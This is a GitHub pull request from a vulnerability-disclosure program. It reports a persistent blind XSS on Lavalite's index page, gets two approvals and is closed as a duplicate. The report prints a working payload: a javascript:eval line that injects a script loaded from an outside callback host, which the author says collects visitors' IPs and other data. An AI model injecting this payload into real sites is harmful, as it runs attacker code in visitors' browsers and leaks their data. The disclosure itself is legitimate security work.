Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Persistent Blind XSS triggered in lavalite @index page #705

Closed
wants to merge 8 commits into from
Closed

Persistent Blind XSS triggered in lavalite @index page #705

wants to merge 8 commits into from

Conversation

B3EF
Copy link
Contributor

@B3EF B3EF commented Sep 19, 2020
edited
Loading

✍️ Description

during my hunt for XSS, I have accidentally dropped an xss payload which was accidentally shown on the index page leading to a persistent xss triggered entirely from a different account, even if an unauthenticated user views the index page the XSS payload gets triggered and sends the corresponding users IP address and other stuffs to the XSS payload user. It's a kind of account takeover vulnerability but as we are already admin it doesn't mean anything to us, so this can be considered as a persistent XSS at the index page of lavalite.
payload :-

javascript:eval('var a=document.createElement(\'script\');a.src=\'https://beefee.xss.ht\';document.body.appendChild(a)')

1
8

POC in the README.md file

💥 Impact

XSS payloads executed.

✅ Checklist

  • Created and populated the README.md and vulnerability.json files
  • Provided the repository URL and any applicable permalinks
  • Defined all the applicable weaknesses (CWEs)
  • Proposed the CVSS vector items i.e. User Interaction, Attack Complexity
  • Checked that the vulnerability affects the latest version of the package released
  • Checked that a fix does not currently exist that remediates this vulnerability
  • Complied with all applicable laws

@huntr-helper huntr-helper added the disclosure Vulnerability disclosure label Sep 19, 2020
@B3EF B3EF changed the title persistent Blind XSS triggered in lavalite @index page Persistent Blind XSS triggered in lavalite @index page Sep 21, 2020
Mik317
Mik317 approved these changes Oct 5, 2020
View reviewed changes
Copy link
Contributor

@Mik317 Mik317 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

LGTM 😄 🎉

Cheers,
Mik

mufeedvh
mufeedvh approved these changes Oct 5, 2020
View reviewed changes
Copy link
Contributor

@mufeedvh mufeedvh left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

LGTM 👏🎉

@ghost ghost mentioned this pull request Oct 6, 2020
Merged
7 tasks
@ghost
Copy link

ghost commented Oct 6, 2020

Closed as duplicate of #690 👍

@ghost ghost closed this Oct 6, 2020
This pull request was closed.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@mufeedvh mufeedvh mufeedvh approved these changes

@Mik317 Mik317 Mik317 approved these changes

@bbeale bbeale Awaiting requested review from bbeale

Assignees
No one assigned
Labels
disclosure Vulnerability disclosure
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
4 participants
@B3EF @mufeedvh @Mik317 @huntr-helper